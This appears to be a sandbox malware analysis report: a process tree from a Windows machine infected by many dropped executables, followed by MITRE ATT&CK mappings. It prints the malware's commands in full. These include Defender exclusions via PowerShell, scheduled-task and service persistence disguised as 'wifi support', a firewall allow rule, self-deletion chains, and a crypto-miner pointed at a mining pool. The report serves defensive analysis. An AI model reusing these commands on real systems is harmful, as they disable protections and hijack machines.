- C:\Users\Admin\Documents\xB5z0yzTNCzEnQ5Sdsc5cH0z.exe
  "C:\Users\Admin\Documents\xB5z0yzTNCzEnQ5Sdsc5cH0z.exe"
  2⤵
  - Executes dropped EXE
  PID:3556
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "xB5z0yzTNCzEnQ5Sdsc5cH0z.exe" /f & erase "C:\Users\Admin\Documents\xB5z0yzTNCzEnQ5Sdsc5cH0z.exe" & exit
    3⤵
    PID:6576
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "xB5z0yzTNCzEnQ5Sdsc5cH0z.exe" /f
      4⤵
      Kills process with taskkill
      PID:7516
- C:\Users\Admin\Documents\kMjn8aZpdtnEKh5KpqdhqhR8.exe
  "C:\Users\Admin\Documents\kMjn8aZpdtnEKh5KpqdhqhR8.exe"
  2⤵
  PID:4028
- - C:\Users\Admin\Documents\kMjn8aZpdtnEKh5KpqdhqhR8.exe
    "C:\Users\Admin\Documents\kMjn8aZpdtnEKh5KpqdhqhR8.exe"
    3⤵
    - Executes dropped EXE
    PID:5352
- C:\Users\Admin\Documents\L28eKSsFEaNsSWZB8uOo4sCY.exe
  "C:\Users\Admin\Documents\L28eKSsFEaNsSWZB8uOo4sCY.exe"
  2⤵
  - Executes dropped EXE
  PID:4004
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Ou3tPfureT.exe"
    3⤵
    PID:5892
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:6896
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5892 -s 264
      4⤵
      Program crash
      PID:6284
- C:\Users\Admin\Documents\vx48RESUjaScJXT0lL7USQbE.exe
  "C:\Users\Admin\Documents\vx48RESUjaScJXT0lL7USQbE.exe"
  2⤵
  - Executes dropped EXE
  PID:3596
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3596 -s 224
    3⤵
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3520
- C:\Users\Admin\Documents\6tzuxAm54K0qumJlV_epPIQs.exe
  "C:\Users\Admin\Documents\6tzuxAm54K0qumJlV_epPIQs.exe"
  2⤵
  - Executes dropped EXE
  PID:3588
- C:\Users\Admin\Documents\IBNoSWbm0UZdlYINvPs8oQHo.exe
  "C:\Users\Admin\Documents\IBNoSWbm0UZdlYINvPs8oQHo.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2704
- - C:\Users\Admin\Documents\IBNoSWbm0UZdlYINvPs8oQHo.exe
    "C:\Users\Admin\Documents\IBNoSWbm0UZdlYINvPs8oQHo.exe"
    3⤵
    PID:5616
- C:\Users\Admin\Documents\CA1MPjOiqxKBjHVdXiqhl4CD.exe
  "C:\Users\Admin\Documents\CA1MPjOiqxKBjHVdXiqhl4CD.exe"
  2⤵
  PID:1804
- - C:\Users\Admin\Documents\CA1MPjOiqxKBjHVdXiqhl4CD.exe
    "C:\Users\Admin\Documents\CA1MPjOiqxKBjHVdXiqhl4CD.exe"
    3⤵
    - Executes dropped EXE
    PID:5372
- C:\Users\Admin\Documents\nVZ8GGqoIT8lpPa3cVzq8Chd.exe
  "C:\Users\Admin\Documents\nVZ8GGqoIT8lpPa3cVzq8Chd.exe"
  2⤵
  - Executes dropped EXE
  PID:3964
- C:\Users\Admin\Documents\HmzK1md8_FWIonIcIOaOYgBn.exe
  "C:\Users\Admin\Documents\HmzK1md8_FWIonIcIOaOYgBn.exe"
  2⤵
  - Executes dropped EXE
  PID:3968
- - C:\Users\Admin\AppData\Local\Temp\ae65718f-237e-4f58-872f-1b7c69375771\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\ae65718f-237e-4f58-872f-1b7c69375771\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\ae65718f-237e-4f58-872f-1b7c69375771\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
    3⤵
    PID:1640
  - - C:\Users\Admin\AppData\Local\Temp\ae65718f-237e-4f58-872f-1b7c69375771\AdvancedRun.exe
      "C:\Users\Admin\AppData\Local\Temp\ae65718f-237e-4f58-872f-1b7c69375771\AdvancedRun.exe" /SpecialRun 4101d8 1640
      4⤵
      PID:7080
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\HmzK1md8_FWIonIcIOaOYgBn.exe" -Force
    3⤵
    PID:6236
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\HmzK1md8_FWIonIcIOaOYgBn.exe" -Force
    3⤵
    PID:7668
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe
    3⤵
    PID:7716
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe
    3⤵
    PID:7824
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    3⤵
    PID:7924
- C:\Users\Admin\Documents\myRngZxC_4YtDAhZOXTipPl5.exe
  "C:\Users\Admin\Documents\myRngZxC_4YtDAhZOXTipPl5.exe"
  2⤵
  - Executes dropped EXE
  PID:3684
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im myRngZxC_4YtDAhZOXTipPl5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\myRngZxC_4YtDAhZOXTipPl5.exe" & del C:\ProgramData\*.dll & exit
    3⤵
    PID:9652
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im myRngZxC_4YtDAhZOXTipPl5.exe /f
      4⤵
      Kills process with taskkill
      PID:9296
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 6
      4⤵
      Delays execution with timeout.exe
      PID:14652
- C:\Users\Admin\Documents\VanaHT4QlpsKA0LN1kfvOG6e.exe
  "C:\Users\Admin\Documents\VanaHT4QlpsKA0LN1kfvOG6e.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:3844
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:4680
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:4768
- C:\Users\Admin\Documents\hYyiCDf_ddrWIqTGb2tD0pXG.exe
  "C:\Users\Admin\Documents\hYyiCDf_ddrWIqTGb2tD0pXG.exe"
  2⤵
  - Executes dropped EXE
  PID:2964
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 664
    3⤵
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4448
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 708
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:4144
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 644
    3⤵
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
    PID:5148
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 708
    3⤵
    - Program crash
    PID:5752
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 892
    3⤵
    - Program crash
    PID:4040
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 1080
    3⤵
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Program crash
    PID:5236
- C:\Users\Admin\Documents\gkcsEgoXahViwFUKBbzq5Uby.exe
  "C:\Users\Admin\Documents\gkcsEgoXahViwFUKBbzq5Uby.exe"
  2⤵
  - Executes dropped EXE
  PID:2748
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\GKCSEG~1.DLL,s C:\Users\Admin\DOCUME~1\GKCSEG~1.EXE
    3⤵
    - Loads dropped DLL
    PID:5988
  - - C:\Windows\SysWOW64\RUNDLL32.EXE
      C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\GKCSEG~1.DLL,bBdVeUxX
      4⤵
      PID:9884
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\GKCSEG~1.DLL
        5⤵
        
        PID:17828
    - - C:\Windows\SysWOW64\RUNDLL32.EXE
        
        C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\GKCSEG~1.DLL,kVo2MVBnSQ==
        5⤵
        
        PID:7156
      - C:\Windows\system32\rundll32.exe
        
        C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 17897
        6⤵
        
        PID:14652
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        7⤵
        
        PID:17864
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpBBE4.tmp.ps1"
        5⤵
        
        PID:27664

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:8472
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:8560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:9124

C:\Users\Admin\AppData\Local\Temp\C1FA.exe
C:\Users\Admin\AppData\Local\Temp\C1FA.exe
1⤵
PID:11108
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\povpagsf\
  2⤵
  PID:15960
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\twupjqak.exe" C:\Windows\SysWOW64\povpagsf\
  2⤵
  PID:17528
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create povpagsf binPath= "C:\Windows\SysWOW64\povpagsf\twupjqak.exe /d\"C:\Users\Admin\AppData\Local\Temp\C1FA.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:18632
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" description povpagsf "wifi internet conection"
  2⤵
  PID:20556
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" start povpagsf
  2⤵
  PID:25848
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
  2⤵
  PID:27980

C:\Users\Admin\AppData\Local\Temp\951A.exe
C:\Users\Admin\AppData\Local\Temp\951A.exe
1⤵
PID:12204
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\951A.exe"
  2⤵
  PID:1776
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:32032

C:\Users\Admin\AppData\Local\Temp\B092.exe
C:\Users\Admin\AppData\Local\Temp\B092.exe
1⤵
PID:10940
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -start
  2⤵
  PID:30304
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -agent 0
    3⤵
    PID:33660
- C:\Windows\SysWOW64\notepad.exe
  notepad.exe
  2⤵
  PID:31344

C:\Users\Admin\AppData\Local\Temp\BAB5.exe
C:\Users\Admin\AppData\Local\Temp\BAB5.exe
1⤵
PID:4772

C:\Users\Admin\AppData\Local\Temp\8EB0.exe
C:\Users\Admin\AppData\Local\Temp\8EB0.exe
1⤵
PID:14012

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2468

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:11252

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:12612

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:14376

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:14608

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:14736

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:14844

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:15032

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:15128

C:\Users\Admin\AppData\Roaming\suvarts
C:\Users\Admin\AppData\Roaming\suvarts
1⤵
PID:19840
- C:\Users\Admin\AppData\Roaming\suvarts
  C:\Users\Admin\AppData\Roaming\suvarts
  2⤵
  PID:24848

C:\Windows\SysWOW64\povpagsf\twupjqak.exe
C:\Windows\SysWOW64\povpagsf\twupjqak.exe /d"C:\Users\Admin\AppData\Local\Temp\C1FA.exe"
1⤵
PID:26056
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:26436
- - C:\Windows\SysWOW64\svchost.exe
    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
    3⤵
    PID:7992

C:\Users\Admin\AppData\Roaming\suvarts
C:\Users\Admin\AppData\Roaming\suvarts
1⤵
PID:33256

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

New Service

T1050

Scheduled Task

Privilege Escalation

New Service

T1050

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

File Deletion

T1107

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery